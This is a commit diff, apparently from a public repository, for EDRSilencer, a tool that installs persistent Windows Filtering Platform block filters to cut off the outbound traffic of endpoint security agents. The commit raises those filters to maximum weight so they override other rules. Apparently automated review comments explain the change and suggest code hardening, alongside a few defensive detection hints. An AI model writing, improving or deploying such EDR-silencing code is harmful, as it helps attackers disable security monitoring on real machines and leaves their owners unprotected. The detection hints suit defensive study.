Verion 1.4: bug fixes
netero1010 committed Nov 3, 2024
1 parent dde9400 commit 0e73a70
Showing 2 changed files with 8 additions and 2 deletions.
8 changes: 7 additions & 1 deletion EDRSilencer.c
@@ -172,6 +172,9 @@ void BlockEdrProcessTraffic() {
filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_BLOCK;
UINT64 weightValue = 0xFFFFFFFFFFFFFFFF;
filter.weight.type = FWP_UINT64;
filter.weight.uint64 = &weightValue;
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
@@ -277,6 +280,9 @@ void BlockProcessTraffic(char* fullPath) {
filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_BLOCK;
UINT64 weightValue = 0xFFFFFFFFFFFFFFFF;
filter.weight.type = FWP_UINT64;
filter.weight.uint64 = &weightValue;
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
@@ -428,7 +434,7 @@ void UnblockWfpFilter(UINT64 filterId) {

void PrintHelp() {
printf("Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>\n");
printf("Version: 1.3\n");
printf("Version: 1.4\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n");
printf(" EDRSilencer.exe blockedr\n\n");
printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n");
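Review bot: The three lines added in BlockEdrProcessTraffic (`UINT64 weightValue = 0xFFFFFFFFFFFFFFFF;` through `filter.weight.uint64 = &weightValue;`) and repeated verbatim in BlockProcessTraffic carry no comment, and the commit title's "bug fixes" does not say what they fix. As written they give a persistent `FWP_ACTION_BLOCK` filter at `FWPM_LAYER_ALE_AUTH_CONNECT_V4` an explicit weight of the largest UINT64, presumably so it takes precedence over other filters during arbitration; a comment such as `/* explicit maximum weight: this block filter is meant to outrank other filters at this layer */` would state that intent. For a reader on the defensive side, that combination (persistent flag, block action, an `FWPM_CONDITION_ALE_APP_ID` condition naming a security agent's executable, maximum weight) is worth looking for when enumerating WFP filters or reviewing Filtering Platform Policy Change audit events. `filter.weight.uint64` stores the address of a local, and the call that consumes `filter` lies outside the hunk in both functions, so its lifetime cannot be confirmed from here.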
2 changes: 1 addition & 1 deletion utils.c
@@ -141,7 +141,7 @@ ErrorCode ConvertToNtPath(PCWSTR filePath, wchar_t* ntPathBuffer, size_t bufferS
return CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME;
}

swprintf(ntPathBuffer, bufferSize, L"%S%S", ntDrivePath, filePath + wcslen(driveName));
swprintf(ntPathBuffer, bufferSize, L"%ls%ls", ntDrivePath, filePath + wcslen(driveName));

for (size_t i = 0; ntPathBuffer[i] != L'\0'; ++i) {
ntPathBuffer[i] = towlower(ntPathBuffer[i]);
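Review bot: The return value of `swprintf` on the changed line is still ignored, so a combined path that does not fit in `bufferSize` wide characters, or a formatting error, goes unnoticed and the lowercasing loop below runs on whatever the buffer then holds. Checking it makes the failure explicit: `if (swprintf(ntPathBuffer, bufferSize, L"%ls%ls", ntDrivePath, filePath + wcslen(driveName)) < 0) return ERROR_CODE_PLACEHOLDER;`, where the placeholder stands for whichever `ErrorCode` member the project uses for this case. ConvertToNtPath starts and ends outside the hunk, so whether callers already validate the path length is not visible here.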
